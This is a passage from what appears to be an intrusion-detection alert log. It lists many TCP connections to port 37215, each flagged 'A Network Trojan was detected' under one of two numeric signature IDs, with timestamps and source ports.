                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.791208
                  SID:2829579
                  Source Port:33036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.373070
                  SID:2829579
                  Source Port:51964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.167062
                  SID:2835222
                  Source Port:55224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.416571
                  SID:2835222
                  Source Port:56168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.606203
                  SID:2835222
                  Source Port:51982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177633
                  SID:2829579
                  Source Port:58256
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.191310
                  SID:2835222
                  Source Port:55258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.620224
                  SID:2829579
                  Source Port:56510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.848645
                  SID:2835222
                  Source Port:60580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.660601
                  SID:2835222
                  Source Port:35456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.951941
                  SID:2835222
                  Source Port:47434
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.409717
                  SID:2835222
                  Source Port:59868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.001228
                  SID:2829579
                  Source Port:51546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532382
                  SID:2829579
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.457605
                  SID:2835222
                  Source Port:48056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.276755
                  SID:2829579
                  Source Port:44172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.520220
                  SID:2829579
                  Source Port:57418
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.540991
                  SID:2835222
                  Source Port:37198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.406451
                  SID:2835222
                  Source Port:35456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538484
                  SID:2829579
                  Source Port:41760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548548
                  SID:2829579
                  Source Port:45322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.333954
                  SID:2829579
                  Source Port:34000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.505039
                  SID:2829579
                  Source Port:48810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.511360
                  SID:2835222
                  Source Port:47924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.256885
                  SID:2829579
                  Source Port:58658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.857818
                  SID:2835222
                  Source Port:38488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.207255
                  SID:2829579
                  Source Port:40656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881416
                  SID:2835222
                  Source Port:60208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.757846
                  SID:2835222
                  Source Port:60432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.201390
                  SID:2829579
                  Source Port:51872
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.639847
                  SID:2829579
                  Source Port:56122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.761969
                  SID:2829579
                  Source Port:34706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.880072
                  SID:2829579
                  Source Port:54736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.297607
                  SID:2829579
                  Source Port:53486
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.276755
                  SID:2835222
                  Source Port:38278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.559340
                  SID:2829579
                  Source Port:49004
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.060158
                  SID:2829579
                  Source Port:50390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.395697
                  SID:2835222
                  Source Port:36544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.193272
                  SID:2829579
                  Source Port:49972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744023
                  SID:2835222
                  Source Port:49200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758860
                  SID:2835222
                  Source Port:59730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.344412
                  SID:2829579
                  Source Port:54500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.575059
                  SID:2835222
                  Source Port:51640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.971584
                  SID:2829579
                  Source Port:35484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.107652
                  SID:2829579
                  Source Port:42036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.808295
                  SID:2835222
                  Source Port:43622
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.390012
                  SID:2829579
                  Source Port:45754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.140498
                  SID:2829579
                  Source Port:58144
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.198368
                  SID:2829579
                  Source Port:52230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.751159
                  SID:2835222
                  Source Port:33046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.878346
                  SID:2835222
                  Source Port:47812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.805818
                  SID:2835222
                  Source Port:48282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.161676
                  SID:2835222
                  Source Port:57530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.375701
                  SID:2829579
                  Source Port:34534
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.561465
                  SID:2835222
                  Source Port:37540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.735455
                  SID:2829579
                  Source Port:48218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.810948
                  SID:2829579
                  Source Port:39744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426350
                  SID:2829579
                  Source Port:57350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.945424
                  SID:2835222
                  Source Port:45122
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.966611
                  SID:2829579
                  Source Port:37482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.655011
                  SID:2829579
                  Source Port:56348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.296739
                  SID:2829579
                  Source Port:34592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.368823
                  SID:2835222
                  Source Port:41310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.519019
                  SID:2829579
                  Source Port:45302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.432060
                  SID:2829579
                  Source Port:35008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.409730
                  SID:2829579
                  Source Port:36198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.094763
                  SID:2829579
                  Source Port:57270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.962280
                  SID:2829579
                  Source Port:43856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.460013
                  SID:2835222
                  Source Port:42878
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2829579
                  Source Port:38006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.259031
                  SID:2835222
                  Source Port:48100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.309785
                  SID:2835222
                  Source Port:48236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.739922
                  SID:2829579
                  Source Port:60036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.177973
                  SID:2835222
                  Source Port:43390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.650013
                  SID:2829579
                  Source Port:49606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.573004
                  SID:2835222
                  Source Port:38548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.533375
                  SID:2835222
                  Source Port:55586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.341991
                  SID:2829579
                  Source Port:38786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842656
                  SID:2829579
                  Source Port:45702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.011298
                  SID:2829579
                  Source Port:58570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.821569
                  SID:2835222
                  Source Port:35094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.844919
                  SID:2835222
                  Source Port:39248
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.584651
                  SID:2829579
                  Source Port:39818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994273
                  SID:2835222
                  Source Port:33808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.129630
                  SID:2829579
                  Source Port:51020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.158324
                  SID:2835222
                  Source Port:35888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.501792
                  SID:2829579
                  Source Port:40530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.817860
                  SID:2829579
                  Source Port:48322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.342964
                  SID:2835222
                  Source Port:52690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.930500
                  SID:2829579
                  Source Port:57818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.948537
                  SID:2835222
                  Source Port:55536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.562470
                  SID:2829579
                  Source Port:45074
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.564207
                  SID:2835222
                  Source Port:33628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.604803
                  SID:2835222
                  Source Port:33964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.777925
                  SID:2829579
                  Source Port:60644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.001475
                  SID:2829579
                  Source Port:43536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.872496
                  SID:2829579
                  Source Port:47260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875328
                  SID:2835222
                  Source Port:55836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.754191
                  SID:2829579
                  Source Port:33036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.353387
                  SID:2835222
                  Source Port:33216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.772266
                  SID:2829579
                  Source Port:34444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.827269
                  SID:2829579
                  Source Port:58886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.081502
                  SID:2829579
                  Source Port:41634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.089956
                  SID:2835222
                  Source Port:54264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.485582
                  SID:2829579
                  Source Port:43674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.195980
                  SID:2829579
                  Source Port:51722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.586021
                  SID:2835222
                  Source Port:59272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.979594
                  SID:2835222
                  Source Port:50994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662129
                  SID:2835222
                  Source Port:51310
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.811678
                  SID:2835222
                  Source Port:53190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.652301
                  SID:2829579
                  Source Port:55152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.951496
                  SID:2829579
                  Source Port:45264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.257724
                  SID:2835222
                  Source Port:33660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.642982
                  SID:2835222
                  Source Port:41818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.310661
                  SID:2829579
                  Source Port:59554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.901645
                  SID:2835222
                  Source Port:54730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.803145
                  SID:2835222
                  Source Port:43606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.423394
                  SID:2835222
                  Source Port:51646
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.513484
                  SID:2835222
                  Source Port:47948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828942
                  SID:2829579
                  Source Port:50374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789175
                  SID:2835222
                  Source Port:44410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.071097
                  SID:2835222
                  Source Port:49558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.657783
                  SID:2829579
                  Source Port:57774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.437789
                  SID:2829579
                  Source Port:50374
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454697
                  SID:2835222
                  Source Port:43086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.637421
                  SID:2829579
                  Source Port:35400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617808
                  SID:2829579
                  Source Port:52612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.887676
                  SID:2829579
                  Source Port:32820
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.507738
                  SID:2829579
                  Source Port:55700
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.480663
                  SID:2835222
                  Source Port:57314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2829579
                  Source Port:39406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.483664
                  SID:2829579
                  Source Port:50252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789652
                  SID:2835222
                  Source Port:35160
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702114
                  SID:2835222
                  Source Port:35936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.915007
                  SID:2835222
                  Source Port:53600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.906271
                  SID:2835222
                  Source Port:43532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.210385
                  SID:2835222
                  Source Port:46042
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.494630
                  SID:2835222
                  Source Port:59478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.208833
                  SID:2829579
                  Source Port:59072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.743093
                  SID:2829579
                  Source Port:48940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.649894
                  SID:2829579
                  Source Port:38544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739642
                  SID:2829579
                  Source Port:43116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.446211
                  SID:2835222
                  Source Port:42264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.365413
                  SID:2829579
                  Source Port:52640
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.808876
                  SID:2835222
                  Source Port:47754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.783788
                  SID:2835222
                  Source Port:58320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.204295
                  SID:2835222
                  Source Port:50002
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.858364
                  SID:2829579
                  Source Port:47062
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595004
                  SID:2835222
                  Source Port:55038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.322732
                  SID:2835222
                  Source Port:53392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.542620
                  SID:2835222
                  Source Port:53594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.628509
                  SID:2829579
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.850341
                  SID:2829579
                  Source Port:50760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.257724
                  SID:2829579
                  Source Port:38164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.949287
                  SID:2835222
                  Source Port:42992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.069487
                  SID:2835222
                  Source Port:40390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.222461
                  SID:2829579
                  Source Port:44302
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.952694
                  SID:2835222
                  Source Port:36484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.876445
                  SID:2835222
                  Source Port:51892
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.718757
                  SID:2829579
                  Source Port:46378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.523012
                  SID:2835222
                  Source Port:48072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.828037
                  SID:2829579
                  Source Port:57264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.986664
                  SID:2829579
                  Source Port:57236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470816
                  SID:2835222
                  Source Port:38422
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.166919
                  SID:2829579
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.945867
                  SID:2829579
                  Source Port:58744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.798195
                  SID:2835222
                  Source Port:57852
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.943279
                  SID:2829579
                  Source Port:52142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.176573
                  SID:2835222
                  Source Port:46238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.506758
                  SID:2835222
                  Source Port:51320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.853049
                  SID:2835222
                  Source Port:58298
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.171855
                  SID:2829579
                  Source Port:56746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.840448
                  SID:2829579
                  Source Port:55102
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.659396
                  SID:2829579
                  Source Port:34258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.406016
                  SID:2835222
                  Source Port:32982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.776063
                  SID:2835222
                  Source Port:54860
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.881754
                  SID:2835222
                  Source Port:48286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.040110
                  SID:2829579
                  Source Port:33616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2829579
                  Source Port:49744
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.631188
                  SID:2829579
                  Source Port:59912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.846154
                  SID:2835222
                  Source Port:44526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.580617
                  SID:2835222
                  Source Port:53556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.989706
                  SID:2829579
